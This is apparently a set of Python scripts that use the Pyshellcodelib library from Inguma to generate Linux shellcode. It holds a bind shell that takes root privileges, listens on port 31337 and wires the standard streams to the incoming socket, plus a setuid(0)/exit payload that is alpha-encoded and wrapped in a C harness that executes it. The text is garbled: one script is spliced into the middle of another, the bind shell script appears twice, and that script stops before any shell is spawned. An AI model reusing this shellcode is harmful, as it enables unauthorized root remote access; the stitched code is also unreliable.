#!/usr/bin/python
"""
Classical bind shellcode with Pyshellcodelib from Inguma
Joxean Koret
"""
import sys
import socket
from pyshellcodelib import PyEgg
egg = PyEgg("linux")
gen = egg.generator
# Change to user root
egg.setuid(0)
egg.setgid(0)
# Listen in all available addresses at port 31337
egg.socket(socket.AF_INET, socket.SOCK_STREAM)
egg.bind(31337)
egg.listen()
# Got a connection, duplicate fd descriptors
egg.accept()
egg.dup2(2)
egg.dup2(1)
egg.dup2(0)
# Uncomment to append 101 characters (NOPS)
#!/usr/bin/python
from pyshellcodelib import PyEgg
a = PyEgg("linux")
gen = a.generator
# Ejecutamos setuid(0)
a.buf += gen.xorEax()
a.buf += gen.xorEbx()
a.buf += gen.call("setuid")
# Saltamos los NOPs que generamos a continuacion
a.buf += gen.jmpTo(3)
# La generacion NOPs es aleatoria tal y como usted podria esperar
a.buf += gen.nop(2)
# Ahora simplemente salimos devolviendo 0
a.buf += gen.xorEax()
a.buf += gen.call("exit")
a.alphaEncode()
sc = a.getShellcode()
print "#include <stdio.h>"
print
print 'char *sc="%s";' % sc
print
print "int main(void) {"
print "\t((void(*)())sc)();"
print "}"
#!/usr/bin/python
"""
Classical bind shellcode with Pyshellcodelib from Inguma
Joxean Koret
"""
import sys
import socket
from pyshellcodelib import PyEgg
egg = PyEgg("linux")
gen = egg.generator
# Change to user root
egg.setuid(0)
egg.setgid(0)
# Listen in all available addresses at port 31337
egg.socket(socket.AF_INET, socket.SOCK_STREAM)
egg.bind(31337)
egg.listen()
# Got a connection, duplicate fd descriptors
egg.accept()
egg.dup2(2)
egg.dup2(1)
egg.dup2(0)